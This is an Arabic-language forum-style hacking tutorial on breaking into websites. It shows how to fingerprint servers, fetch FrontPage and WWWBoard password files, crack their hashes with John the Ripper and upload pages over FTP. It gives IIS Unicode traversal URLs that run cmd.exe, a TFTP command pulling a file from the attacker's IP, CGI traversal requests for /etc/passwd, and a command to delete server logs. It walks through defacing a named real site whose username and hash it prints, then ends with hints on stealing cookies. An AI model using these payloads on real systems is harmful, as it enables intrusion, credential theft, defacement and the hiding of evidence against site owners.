************* الملقمات اشهرها اثنين: - 18 IIS: من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها). apache: من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب. ----------------------------------------------------------------- 19- اول خطوة في الاختراق هي اخذ المعلومات: يعني نعرف الموقع شنو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها. طيب الحين عندنا موقع وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها عندك الموقع http://www.netcraft.net/ http://www.whois.com/ ملاحظة: نكتب الموقع من غير http:// ولا / اللي بالاخير او نستخدم التلنت. 1 - مثال على ملقمات اي اي اس: راح يطلع لنا التالي The site http://www.***.org/is running Microsoft-IIS/5.0 on Windows 2000 طيب الحين عرفنا معلومتين مهمتين اول شيء انه شغال على الملقم IIS5.0 ثاني شيء شغال على نظام ويندوز 2000 اول شيء نجرب ثغرات IIS5.0 عليه إذا مانفع شيء نشوف ثغرات نظام ويندوز 2000 طيب الحين فيه حاجة اسمها يوني كود هذه تخترق فيها عن طريق المتصفح وماتمشي إلا مع ملقمات IIS وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع. طيب لنفرض انه ماطلع فيها ثغرات؟ نشوف محتويات الموقع نفسه نشوف إن كان عنده سجل زوار او منتدى او .... 2 - مثال على ملقمات اباتشي: ناخذ مثال موقع ارانك http://www.arank.com/ لو حللناه بالنيت كرافت راح نشوف النتيجة التالية: The site http://www.arank.com/is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux هنا يهمنا ثلاث اشياء:- 1- الملقم وهو: apache 1.3.20 2- ودعم فرونت بيج وهذه مليانة ثغرات FrontPage/5.0.2.2510 3- النظام وهو Linux -=-=-=-=-=-=-=-=-=-=-=-=-=-=- الملقم: اول شيء اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط هذه على جنب. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- دعم الفرونت بيج زي ماقلنا الفرونت بيج مليان ثغرات وثغراته قوية وكثيرة تقريبا منها مجلد _vti_pvt و _private هذه اللي نحتاجها غيره مامنه فايدة داخل المجلدين راح نلاقي اربع ملفات مهمة وهي service.pwd و users.pwd و authors.pwd و adminstators.pwd ويعتبر هذا اخطر ملف طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالمفكرة ونلاقي السطر هذا على سبيل المثال goodyco:CalXS8USl4TGM وهذا من موقع قودي http://www.goody.com.sa/_vti_pvt/service.pwd طيب الحين goodyco اليوزر والباسورد مشفر واللي هو CalXS8USl4TGM وشلون ينفك؟ ينفك ببرنامج اسمه john the repaier ( شرح الاستخدام موجود في اخر موضوع في هذا المجلد) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- طيب نروح للفقرة الثالثة واللي هي النظام زي ماشفنا النظام هو لينكس لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر لكن هنا راح تواجهك مشكلتين اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ال telnet واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته المشكلة الثانية لازم يكون عندك لينكس اصلا علشان ثغراته بلغة ال c وهذه ماتشتغل إلا عاللينكس فقط. ---------------------------------------------------------------------- 20- (مواقع تطلعلك ثغرات الانظمة والويندوز والمنتديات وووو....) http://www.ussrback.com/ الموقع هذا خطير جداً جداً تروح ل EXPLOITS اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من c و perl و يوني كود. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- http://neworder.box.sk هذا الموقع مفيد جدا تكتب مثلا فوق بالمربع اللي عاليمين IIS او apache او منتدى واصدارته او اي برنامج ويطلع لك ثغراته. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- أرشيف لثغرات www.securiteam.com/exploits/archive.html أرشيف لثغرات www.ussrback.com أرشيف لثغرات www.secureroot.com أرشيف لثغرات www.rootshell.com أرشيف لثغرات www.ussrback.com مواقع لثغرات www.secureroot.com/category/exploits --------------------------------------------------------------------- 20- هناك انظمة وملقمات كثيرة منها: Apache (الملقم) IIS(الملقم) SunOS(الملقم) FreeBSD (My BaBe)(الملقم) OpenBSD(الملقم) NetBSD(الملقم) AIX(الملقم) IRIX(الملقم) NetScape(الملقم) Enterprise(الملقم) Windows/NT/2000/xp (نظام التشغيل) Linux(نظام الشتغيل ) ------------------------------------------------------------------- له ست مجلدات) 21- (اليونكس
bin خاص بالملفات الثنائيه يعني اللي تشغل النظام etc ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او passwd dev ملفات الاجهزه lib مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل tmp الملفات الموقته او غير الثابته usr اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام -------------------------------------------------------------------- 22- (اوامر الاف تي بي) Pwd لكي تعرف ما يحتويه الهارد ديسك Cd لإقتحام مجلد مثال Cd black في هدا المثال قمت بإقتحام مجلد المسمى بلاك Ls لكي يتضح لك محتوى المجلد أو الهارد ديسك Get لكي تحمل الى سطح المكتب حق جهازك مثال Get black.exe Put العملية العكسية ل Get يعني ان تأخد ملف من سطح المكتب حق جهازك و تضعه في في جهاز الضحية مثال Put black.exe Clos لقطع الإتصال مع الضحية يمكنك تشغيل الاف تي بي من الويندوز عن طريق : START > RUN > ftp -n hostname ---------------------------------------------------------------------------- 23- بورتات برامج:- 7 echo 21 telnet 23 ftp 25 smtp 80 http 110 POP ---------------------------------------------------------------------------- c - 24 هو برنامج سي لكنه سورس كود فقط واغلب الثغرات التي يتم كتابتها بالسي ولاكن المشكلة انه لايمكن تشغيله تحت بيئة ويندوزفيجب ان يكون عندك Linux او Shell Account ---------------------------------------------------------------------------- 25 - ملاحظة رسائل لأخطاء ومن أشهرها الرسالة 404 Error وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطير لكنها تفيد في عملية الاختراق. ---------------------------------------------------------------------------(كيف تحصل على شيل اكاونت مجانا)
و تنقسم الشيل اكونتس الي نوعين: 1-restricted 2-non-restricted و الفرق بينهما ان restricted مدفوع القيمه و يمكنك من تنفيذ اي command اما ال non restricted فهو مجاني و لكن مشكلته انه لا يمكنك من تنفييذ كل الاوامر! لكي تحصل علي شيل اكونت مجانا يمكنك الحصول عليه من اي مزود شيل اكونتس علي الشبكه مثل www.cyberarmy.com او الاتصال بمزود الخدمه و اطلب منه شيل اكونت طبعا سيسالك لماذا تريد الشيل اكونت اجب عليه بانك تريد استخدام و التدرب علي نظام اللينكس و اليونكس فيما بعد و هذي الاجابه كافيه لك يعطيك شيل اكونت و الشيل اكونتس مختلفه و تتميز فيما بينها بالتالي: 1-telnet 2-nslookup و الذي يعطيك معلومات عن المضيف 3-ftp 4-finger 4-trace route 5-dig و هذا الامر غير متاح غالبا في معظم الشيلز المجانيه 6-netstat 7-gcc و هذا كمبيلير للغه البرمجه c 8-gzip لفك ضغط الملفات 9-lynx متصفح للانترنت
------------------------------------------------------------------ تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج - 27 .TFTP -=-=-=-=-=-=-=-=-=-=-=-=- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\ قم بتشغيل برنامج TFTP :ونفذ الامر في الفقرة التالية /c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.ht m tftp.exe وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر "-i" وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات 1.1.1.1 رقم الايبي الخاص بك GET وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال index.htm اسم الملف بجهازك \inetpub\wwwroot\ اسم الدليل في السيرفر index.htm اسم الملف على السيرفر ----------------------------------------------------------------- تحاول أن تدخل لوحة التحكم معظم المواقع تكون لوحة تحكمها على الشكل - 28 www.sitename.com:2082 أو www.sitename.com/cpanel هذا في حال كان الموقع يستخدم الـ CPanel وهو البرنامج الأكثر شيوعاً .. ومن ثم تظهر لك نافذة اكتب فيها اسم المستخدمة وكلمة السر .. وتصير في الداخل. ---------------------------------------------------------------- 29- اماكن تواجد ملف باسوورد المواقع: Sunos 5.0 etc/shadow او etc/passwd Linux etc/shadow او etc/passwd BSD4.3 –RENO etc/master.passwd AIX etc/security/passwd NT ويندوز scripts/passwd ---------------------------------------------------------------- 30- كيف اتاكد انا الثغر شغالة ولا لا؟ - جرب اللثغرة بواسطة الـ URL او الـ URI . ---------------------------------------------------------------- 31- كيف تسد ثغرات اي اي اس اذا كانت شغالة في موقعك؟ (IIS4.0 on WinNT) http://www.microsoft.com/ntserver/n...862/default.asp (IIS5.0 on Win2000) www.microsoft.com/windows200...862/default.asp ---------------------------------------------------------------- 32 - ما الفرق بين ملف الباسورد المشفر encryption والمضلل shadowed? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- الملف المضلل shadow file يكون مكان كلمة المرور رمز مثل * أو x أو # أو ! وهذا مثال لها root:x:0:1:Super-User:/:/sbin/sh لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh هنا تكون كلمة المرور المشفره هي: Q71KBZlvYSnVw ------------------------------------------------------------------- وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟ - 33 -=-=-=-=-=-=-=-=-=-=-=-=-=-=- يتم كسر كلمة السر المشفرة ببرنامج جون ذا ريبر الذي ساضع طريقة عملة بالتفصيل في اخر الدرس وهذا البرنامج يقوم بتجربة 5000 كلمة بالثانية(سرعة جنونية) مما يجعله الاسرع في فك التشفير. ------------------------------------------------------------------- 34 -اذا كان ملف passwd مضلل ماذا تفعل؟ الان جميع ملفات passwd تكون مضللة ولكن توجد طريقة لفكها اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو shadow ماهي اماكن تواجد ملف shadow في الأنظمة؟ وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي: Linux : /etc/shadow token = * SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو * FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x IRIX : /etc/shadow token = x AIX : /etc/security/passwd token = ! ConvexOS : /etc/shadow or /etc/shadpw token = * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- token تعني الرمز الذي يوجد في الملف passwd وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في /etc/security/passwd ، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو ( ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه). ملف الشادوا تكون الكلام الذي فيه مشفر الخظوة الأخيرة وهي دمج ملف shadow & passwd انصحك في دمج ملف الشادو مع ملف الباس بكتابة هذا الامر في برنامج جون ذا رباير وصلة البرنامج ********************************************** http://packetstorm.securify.com/Crackers/john-16w.zip http://www.geocities.com/wildxone2002/john16.zip http://www.diabolo666-security.com/...er/john-16d.zip http://www.openwall.com/john ********************************************** انبه اولا من ان البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في امر لدمج ملف الشادو مع ملف الباس وذلك لضمان عدم وقوع اخطاء عند الدمج الامر هو unshadow passwd.txt shadow.txt اذا لم تنجح العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع اخطاء عند الدمج فقط قم بتبديل علامة x التي تكون في ملف الباس ب اللام الموجود بدلا عنها في ملف الشادو تطبق العملية في كل علامة x تكون في ملف الباس ------------------------------------------------------------------- 35- فك تشفير ملف shadow asswd بعد دمجه مع ملف x وهو طريقة فك تشفير ملف passwd الدليل الكامل لكسر كلمات السر برنامج John the Ripper لكسر كلمات السر ----------------------------------------------------------------- برنامج - 36 (John the Ripper) احد افضل البرامج لكسر كلمات السر التي يحصل عليها المخترقون من الانظمة (nix*) وهذه الانظمة واخص الاصدارات الحديثة توفر نظام حماية إضافي لملف (PASSWD) بان يكون مضلل وعلى المخترق الحصول على ملف (SHADOW) لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق الخوادم لانها تعطيك المفتاح . ---------------------------------------------------------------- 37 - كيف استغلال الباسورد: يمكنك استغلال باسورد الموقع في التلنت تدخل من التلنت وتفعل ماتريد او انك تدخل من الاف تي بي وهو الأسهل والمنتشر كيفية الدخول ب ftp يمكنك استخدام احد برامج ال ftp منها ws_ftp او CuteFTP 4.2.5 Build 10.4.1 وعنوانه http://63.162.136.2/seniormoments/t...es/fo-wsf76.zip
--------------------------------------------------------------------- 38 - طريقة تنفيذ الثغرات:
مكان تنفيذ الثغرات http://www.xxxxx.com/scripts/..&Aa....exe?/c+dir+c:\ أي بعد دوت كوم بعض الناس يسألون مالذي يظهر او على اي شكل يظهر الحل بسيط هذا الامر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات Dir وطريقة ظهور الملفات في المتصفح تقريبا بنفس طريقة الدوس -------------------------------------------------------------------- 2-(شرح الثغرات واستغلالها) 1 - شرح ثغرة الفرونت بيج وكيفية استغلالها:
ثغرة الفرونت بيج هي ثغرة منتشرة جدا بين المواقع وتأتي عادة بهذا الشكل www.****.com/_vti_pvt يعني الثغرة هي _vti_pvt ومن خلال هذه الثغرة تظهر لك ملفات الموقع (الفرونت بيج) او المشرف
ملاحظة:- تنفذ الثغرة وتوجد على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها لتعرق اذا الموقع مصمم بالفرونت بيج من موقع http://www.netcraft.net تدخل الموقع تشوف قدامك مستطيل أدخل الموقع اللي تبي تجمع معلومات حوله ويهمنا ملف واحد ومن غيره لانستفيد شيئا وهو service.pwd نفتحه بالمفكرة وتشوف الباسوورد لكن هاي الباسوورد مشفرة وتكون بهذا الشكل -FrontPage- ekendall:bYld1Sr73NLKo louisa:5zm94d7cdDFiQ هنا نرى ان الموقع عليه مشرفين ekendall و louisa نفك التشفير بواسطة برنامج جون ذا ريبر طبعا وبعد فك التشفير بالجون ذا ريبر تروح للفرونت بيج file open web وتحط الموقع فتطلعلك الصفحة الرئيسية فغير اللي بدك اياه بعدين save or publish بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط sign وهذا موقع للتطبيق http://www.heyerlist.org/garderobe/_vti_pvt ------------------------------------------------------------------- 2 - شرح ثغرة ملف الباسوورد وكيفية استغلالها:
ثغرة الـ WWWBoard هي أسهل ثغرة بالإضافة إلى الفرونت بيج. لنفترض أن الموقع المراد إختراقه هو http://www.boardprep.net/ لنضف إليه wwwboard/passwd.txt فيصبح العنوان http://www.boardprep.net/wwwboard/passwd.txt نفتح العنوان سوف تجد cknouse:aexMVWnDOyrdE كلمة المرور+ إسم المستخدم يعني إسم المستخدم هو cknouse وكلمة المرور هي aexMVWnDOyrdE فك تشفيره بجون ذي ريبر الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية روح للفتب وإكتب ftp.domen.com ملاحظة إستبدل domen.com بإسم الموقع إلي عندك باسوورده وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم index.html وإرفعها للموقع لتحميل الفتب http://members.home.nl/patrick.pagina/temp/Ws-ftp32.zip -------------------------------------------------------------------- 3 - شرح ثغرة سي جي اي وكيفية استغلالها:
CGI bugs وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح. الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل /cgi-bin/passwd.txt إذا كان الموقع هو www.somesite.com فتكتب الثغرة هكذا في المتفح www.somesite.com/cgi-bin/passwd.txt هذه الثغرة تعرض لك أسماء المستخدمين وكلمات المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين حتى هذه الثغرة يمكن الا تصلح معهم لانها صارت معروفة. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- استغلال العيب في ملفات Cgi & Perl للوصول الى etc/passwd
اولا: سناخذ الثغرات من نوع Show Files اولا عند وجود هذا الملف /cgi-bin/apexec.pl? الباسوورد علينا استغلال هذه الثغرة للوصول الى http://www.target.com/cgi-bin/apexe...te=../../../../ ../../../../../etc/resolv.conf%00.html&passurl=/category/ مع امكانية تغيير path بالملف المراد هذا من جهة البيرل ونفس الكلام ينطبق على السي جي اي /cgi-bin/hsx.cgi? عند وجود هذا الملف في /cgi-bin/ طبق الثغرة التالية http://www.Target.com/cgi-bin/hsx.c..../etc/passwd%00 الطريقة المثلى للبحث عن هذه الملفات اما بالاختراق العشوائي او عن استخدام برنامج سكان للبحث عن ثغرات في الموقع ضع هذه الملفات ضمن لائحة الثغرات مثل /cgi-bin/hsx.cgi? وعند وجوده يتم تطبيق ثغرته. -------------------------------------------------------------------
يتم تطبيق هذه الثغرات مباشرة من المتصفح مستغلين ملف ال cmd.exe لتنفيذ اوامرنا مثال للثغره و تطبيق الاوامر: http://www.xxxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: ----------------------------------------------------------------------------------- امر انشاء دليل جديد http://www.xxxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+cJ ----------------------------------------------------------------------------------- امر الغاء دليل http://www.xxxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+cJ ----------------------------------------------------------------------------------- الامر المستخدم للنسخ http://www.xxxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe ----------------------------------------------------------------------------------- الامر المستخدم للحذف http://www.xxxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp ----------------------------------------------------------------------------------- الامر المستخدم لتغيير مسمى الملف http://www.xxxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm ----------------------------------------------------------------------------------- لامر المستخدم لرؤية محتويات الملف http://www.xxxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:index.htm ----------------------------------------------------------------------------------- الامر المستخدم للكتابة داخل أي ملف http://www.xxxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.txt ----------------------------------------------------------------------------------- ملحوظه : -------- قد نحتاج الى تغيير مسمى الدليل بحيث يكون msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
و الان لتغيير الصفحه الاولى لموقع لابد من : الكتابه على الصفحه الرئيسيه مستخدمين الامر echo برفع صفحتك الشخصيه بواسطة برنامج ال TFTP طريقة الكتابه على الملف الرئيسي للموقع index.htm باستخدام الامر echo ------------------------ مبدئيا لابد من نسخ ملف cmd.exe الي مجلد scripts بهذا الشكل على سبيل المثال : http://www.xxxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe ----------------------------------------------------------------------------------- و بعد ان تم نسخ الملف يمكن تصفح الموقع بالثغره الجديده http://www.xxx.com/scripts/DJ.exe/c+dir+c: و بعدها يمكن تنفيذ الامر echo بالشكل التالي http://www.xxx.com/scripts/DJ.exe?/...hackermail.com+>+c:inetpubwwwrootindex.htm ----------------------------------------------------------------------------------- ملحوظات هامه: -------------- ليس بالضروره ان يكون الاندكس الرئسيه للموقع اسمها index.htm فممكن ان تكون index.html , default.html , default.htm , default.asp فعليك التاكد اولا من اسم الملف و لكن index.htm هو الافتراضي ان يكون الرئيسي - ممكن ان يكون الملف الرئيسي في مجلد غير ال wwwroot لذا فلابد من البحث ... ----------------------------------------------------------------------------------- طريقة استخدام رفع الصفحه بواسطة برنامج TFTP
سيتم تبطيقها ايضا بالثغره التي اقترضتها اعلى حمل برنامج ال tftp فهو صغير و مجاني ضعه في ال c: ضع الاندكس او صفحتك المراد رفعها في ايضا ال c: شغل البرنامج و اجعله جاهزا ثم نفذ الامر التالي: http://www.xxxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+y.y.y.y+GET+index.htm+C:inetpubwwwrootindex.htm ----------------------------------------------------------------------------------- حيث ------- tftp.exe هو البرنامج المستخدم للرفع "i-" براميتر y.y.y.y رقم الايبي الخاص بك و الباقي على ما اظن لا يحتاج توضيح .. C:inetpubwwwrootindex.htm هو الوضع الافتراضي كما ذكرت لكن ممكن ان يختلف من موقع لاخر فلابد من التاكد اولا ----------------------------------------------------------------------------------- و اخيرا لمسح اللوق http://www.xxxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system32/logfiles/*.log ----------------------------------------------------------------------------------- هذا تقريبا كل ما يخص سيرفرات الويندوز و ال IIS اما بالنسبه للمواقع التي سيرفراتها على سبيل المثال : Apache on linux فطريقة التفكيير ستتغير كليا ماعدا الاختراق عن طريق ال ftp server فمعظم نسخ ال ftp لها ثغرات يمكن استغلالها. --------------------------------------------------------------------- 5 - شرح ثغرة اليونيكود وكيفية استغلالها:
اولا ثغرات اليونيكود: UNICODE - Internet Information Service IIS4 - IIS5 اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس
- تعريف باليونيكود . اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - كيفية ايجاد هذه الثغرات . يتم ايجاد هذه الثغرات بطريقتين :- 1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس . 2- بواسطة تطبيق الثغرة على الموقع مباشرة . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - كيف يتم استغلال ثغرات اليونكود . عند تطبيق الثغرة على نظام الـ IIS4 / IIS5 يبدا ملف CMD بفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- الاوامر المستخدمة بواسطة ملف .CMD
الاوامر المستخدمه بواسطة ملف الـ CMD وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حس
ب الامثلة التالية :- - الطريقة الثانية بالتعامل مع الملف2 ssinc.dll والطريقة كما يلي اولا انشاء صفحة باسم test.shtml تكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml كتابة هذا الكود داخل الصفحة بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف الان يتم طلب الصفحة من خلال المتصفح http://www.xxxx.com/test.shtml الان سوف تظهر لك الصفحة الان تستطيع الكتابه وتم تخطي مشكلة الـ Access Denied اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة . 3-الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـ Temp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـ Temp مفتوح لعمليات الاب لوود . 4-الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان . 5-البحث عن ملفات root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها . ------------------------------------------------------------------------- -(شرح البرامج) 1- شرح برنامج جون ذاريبر
حط البرنامج في السي ملاحظة احفظ الباسوورد في نفس ملف البرنامج في ملف .txt وتسميه password عشان تمشي مع الشرح -=-=-=-=-=-=-=-=-=-=-=- س:\البرنامج كيف يشتغل؟ البرنامج يشتغل على الدوس ادخل على الدوس واكتب cd.. الين يصير شكله كذا <:c اكتب john الحين ناقصك اوامر ماهي اوامر البرنامج؟ -=-=-=-=-=-=-=-=-=-=-=- 1-امر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر وصيغته كالتالي: john -w:wordlist.txt password.txt ملف wordlist هي كلمات السر المحتمله و password كلمة السر المشفرة (لا انصح بهذا الاختيار) -=-=-=-=-=-=-=-=-=-=-=- 2-امر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم وصيغته: john -single passwd.txt -=-=-=-=-=-=-=-=-=-=-=- 3-امر يبحث لك عن الارقام فقط وصيغتة: john -iD:igits passwd.txt -=-=-=-=-=-=-=-=-=-=-=- 4-امر يبحث عن الحروف الصغيرة: john -i:Alpha passwd.txt -=-=-=-=-=-=-=-=-=-=-=- 5-امر يبحث لك عن جميع الاحتمالات الممكنة وصيغتة: john -i:all passwd.txt هذا الخيار اذا فشلت فيها كلها لانه طويل بس انه افضل اختيار -=-=-=-=-=-=-=-=-=-=-=- طيب انا اخترت اخر واحد وقعد البرنامج ساعة مافك ولا شئ وانا ماني فاضي له بخلي الكمبيوتر شغال وش اسوي؟ عندي الحل اضغط كنترول + شفت +سي او كنترول+سي ctrl+shift+c ctrl+c -=-=-=-=-=-=-=-=-=-=-=- كيف اكمل ؟ اكتب john -restore وهو يكمل
4-( نخترق موقع مع بعض) اول شي خلينا بالمواقع العادية مو نخترق الياهو مرة وحدة علما بأن اختراق المواقع العاديه سهل. الحين بعد ما قرأنا الدرس الكبير هذا وفهمناه نبي نطبق اللي فهمناه سوف نخترق موقع مع بعض. -------------------------- البرامج اللازمة: Jonh the rippar WS_FTP pro ------------------------- بسم الله نبدأ: 1- الحين انا ما راح اتعبكم بالبحث عن موقع به ثغرات انا راح اعطيكم موقع فيه ثغرة وراح ننفذها وهو: http://www.dsg-art.com/ هذا الموقع مصاب بثغرة ملف الباسوورد اللي هي: wwwboard/passwd.txt الحين ننفذ الثغرة http://www.dsg-art.com/wwwboard/passwd.txt علشان يطلع لينا اليوزر نيم والباسوورد: jc:GXQ4cN0fhbptw jc اليوزر نيم GXQ4cN0fhbptw هذا الباسوورد بس مشفر شلون نفك تشفيره علشان نحصل على الباسوورد الاصلي؟؟؟ طبعا ببرنامج جون ذاريبر والشرح ماله فوق. اوكي فكينا التشفير والحين صار معانا الباسوورد واليوزر نيم مال الموقع خلاص تمت عمليه الاختراق. الحين نبي نكتب تم الاختراق بواسطة دارك بوي شلون ؟ طبعا ببرنامج الفتب WS_FTP PRO اوكي الحين نحط الباسوورد واليوزر نيم بالبرنامج وندخل على الريموت مال الموقع . الحين اذا تبي تدمر الموقع طبعا تمحي الملفات الحين في بين الملفات ملف اسمه index.html هذا ملف الصفحة الرئيسية للموقع الحين احنا نكون مسويين الملف اللي كاتبين فيه تم اختراق هذا الموقع بواسطة دارك بوي من قبل الحين نمحي الملف اندكس مال الموقع وندخل الملف مالنا من الكومبيوتر بعد اختيار مكانه على الكومبيوتر. واللي ما يعرف يسوي صفحة اندكس يقولي انا اعلمه وكمثال عليها انا مسوي صفحة علشان بس اخترق موقع احطها وهي: www.geocities.com/hasssssona خلاص تم اختراق الموقع وترك رساله لصاحبه تم اختراق الموقع .... الحين علشان لا يعرفنا صاحب الموقع نروح ونمسح ملفات اللوقو اللي شرحهها فوق. الان بامكان اي احد قرأهذا الدرس اختراق مواقع عادية بس مو مثل الياهو. -----------------------------------------------------------------------
سهوله اختراق المواقع المجانيه=- نعم,,,ان اختراقها اسهل مماتتصور الاساسيات لاختراق كل شي هو الكوكيز لانه يحتوي على جميع المعلومات((الموقع,,ايمي ل,,الخ)) ولكن يجب ان تعرف عده نقاط مهمه لاختراق اي موقع مجاني اولا=- يجب عليك معرفه نوعيه اصدار المتصفح ثانيا=- عليك معرفه بعض بيانات صاحب الموقع مثل الايميل..الخ وتستطيع التوصل له ببعض الطرق=- ثالثا=- عليك اولا ايجاد الاكواد الازمه لسرقه الكوكيز من المتصفح=-
